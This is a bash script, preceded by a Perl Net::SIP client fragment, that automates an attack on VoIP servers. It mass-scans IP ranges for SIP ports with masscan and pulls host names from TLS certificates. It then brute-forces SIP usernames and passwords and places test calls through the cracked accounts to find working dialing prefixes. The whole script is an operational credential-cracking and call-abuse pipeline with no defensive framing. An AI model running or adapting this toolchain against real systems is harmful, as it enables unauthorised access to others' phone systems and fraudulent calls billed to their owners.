my $ua = Net::SIP::Simple->new(
outgoing_proxy => $ip,
registrar => "sip:".$ip.";transport=tls",
domain => $ip,
from => $user,
auth => [ $user,$pass ]
=======================================================================

#!/bin/bash

# Scan TLS Port
sudo masscan -iL iprange.txt -p5060,6072,14310,6073,7073,6069,6079,6099,6089,5059,5260,5061,5070,5069,6655,5038,5080,5062,15060,6050,6051,5063,5064,5065,5067,5068,5071,5072,5073,5076,5075,5077,5078,1020,5079,1021,1022,1023,6052,6053,6054,6055,6057,6058,6059,6061,6062,6063,6070,6064,6080,6010,5090,5566,9060,4002,5678,5088,6020,5600,5160,1025,9090,5506,6060 -oL masscan.txt --exclude 255.255.255.255 --rate=100000
awk '{print $4 ":" $3}' masscan.txt > 5061.txt
sudo cat 5061.txt | docker run -i projectdiscovery/tlsx -san -cn -nc -v >> TLSxresult.txt

echo -e "\nEnding Scan TLS !\n"

# IP Extractor

echo -e "\nStart IP Extractor ...\n"

grep -Po "(\d+\.){3}\d+:?(\d?){7}" TLSxresult.txt >>cn1
grep -R ':' cn1 >cn2
awk '!a[$0]++' cn2 >IPScn
grep -oP  "(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z0-9][a-z0-9-]{0,61}[a-z0-9]" TLSxresult.txt >>cn1
sed '/:[0-9]*$/ ! s/$/:5061/' cn1 >>ccn
grep -R ':' ccn >cn2
awk '!a[$0]++' cn2 >IPS
sleep 1
sudo rm cn1
sudo rm cn2
sudo rm cnD
sudo rm cnDD
sudo rm ccn
sleep 1

echo -e "\nEnding IP Extractor !\n"

# SIP responses

echo -e "\nStart SIP responses ...\n"

sudo cat IPScn IPS >> IPS
perl run IPS
cat SSL.pal >> IPss
sleep 1

echo -e "\nEnding SIP responses !\n"

# SIP Crack user&password

echo -e "\nStart SIP Crack ...\n"

perl Crack 2000 2 IPss
sudo rm *.pal
sleep 1

echo -e "\nEnding SIP Crack !\n"

# Prefix Testing Call

echo -e "\nStart Prefix Testing ...\n"

perl call VOIPresult 500 30 | tee callfile1
grep -R 'MOHAMMAD' callfile1 >callfile2
cat callfile2 | awk '{print $2,$3,$4,$5,$6}' > QWEASD.txt
awk '!a[$0]++' QWEASD.txt >successCALL.txt
sudo rm callfile1
sudo rm callfile2
sudo rm QWEASD.txt
sleep 2

echo -e "\nEnding Prefix Testing !\n"

# Prefix Testing Prog

echo -e "\nStart Prefix Testing ...\n"

sed 's/$/ 10001 12345/' IPss > IPSprog

perl call IPSprog 500 30 | tee callfile1
grep -R 'MOHAMMAD' callfile1 >callfile2
cat callfile2 | awk '{print $2,$3,$4,$5,$6}' > QWEASD.txt
awk '!a[$0]++' QWEASD.txt >successPROG.txt
sudo rm callfile1
sudo rm callfile2
sudo rm IPSprog
sudo rm QWEASD.txt
sleep 2

echo -e "\nEnding Prefix Testing Prog !\n"

echo -e "\nby Mohammad Elnwajha\n"

